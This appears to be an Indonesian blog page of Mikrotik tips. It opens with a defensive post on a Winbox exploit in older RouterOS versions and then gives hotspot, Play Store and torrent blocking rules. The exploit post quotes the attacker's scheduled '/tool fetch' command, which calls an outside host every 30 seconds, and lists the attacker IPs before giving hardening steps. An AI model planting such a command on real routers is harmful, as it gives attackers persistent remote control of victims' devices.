Pencegahan Remote Exploit Vulnerability Winbox Mikrotik

org yg iseng ini melakukan exploid dari IP 95.154.216.151

setelah berhasil masuk, kemudian menambahkan script dengan isi sebagai berikut

/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

script ini di buat scheduler setiap 30 detik melakukan fetch ke ip 95.154.216.167

hal ini terjadi karena celah di mikrotik seri sebelum versi 6.42.6

langkah-langkah pencegahan

1. ganti password
2. setting user admin hanya bisa diakses dari ip lokal saja
3. buat user lain (selain admin) untuk di akses dari luar (akan lebih baik jika di tambahkan available from ip….)
4. ganti port winbox 8291 dengan port yang lain (ini untuk menghambat proses exploid, krn si cracker akan mencoba mencari port lain jika port ini diganti)
5. upgrade ke versi OS ke seri yg lebih baru
6. lakukan pemblokiran dari ip ip berikut – 95.154.216.160, 95.154.216.167, 95.154.216.151, 95.154.216.163,

korban-korban berjatuhan

sumber

• proof of concept (POC) -> https://youtu.be/pBNIrgAg-a8
• https://forum.mikrotik.com/viewtopic.php?t=133533
• bug mikrotik – https://www.cvedetails.com/vulnerability-list/vendor_id-12508/product_id-23641/Mikrotik-Routeros.html
• zero day – https://www.bleepingcomputer.com/news/security/mikrotik-patches-zero-day-flaw-under-attack-in-record-time/

Advertisements

Mikrotik : Iphone dan Macbook tidak bisa koneksi Hotspot Mikrotik

judul paling bagus sih sebenernya MENANGANI HOTSPOT MIKROTIK YANG TIDAK DI ARAHKAN OTOMATIS KE HALAMAN LOGIN, tapi udah dipake di blog kang Aldy, ya udh gw ganti pake judul di atas aja.

ga pake panjang x lebar x tinggi , langsung aje ye sesuai arahan kang Aldy….

Langkah 1

disable smenetara server hotspot—> masuk ke firewall– > NAT –> naikan  urutan rule unused-hs-chain —>   hidupkan kembali server hotspot di  /ip hotspot servers.

Langkah 2 Continue reading →

Mikrotik : Ijinkan Ping dan remote AP (Access Point) Hotspot Mikrotik yang IPnya berbeda segmen

gambar gambar aja sy kasi yak, good luck :p

Mikrotik : Blokir play store di mikrotik

Tryy this Layer7 protocol

/ip firewall layer7-protocol
add name=Google_PlayStore regexp=^.+(android.clients.google.com).*$

note: for unknown reason this protocol will block youtube as well! 

Also you can try this protocol if the previous one not works:

add name=Google_PlayStore regexp=^.+(android.clients.google.com|play.google.com).*$

I hope anyone who can advise with a proper rule that can block play store but not to affect the youtube.

Permalink

Setting Mikrotik dengan Modem Gpon AN5506-04-F Telkom Indihome

kasi tau ga ya :v

blokir torrent di mikrotik

layer7-rsc (file pdf, rename to rsc)

firewall_filter_rules-rsc (file pdf, rename to rsc)

permalink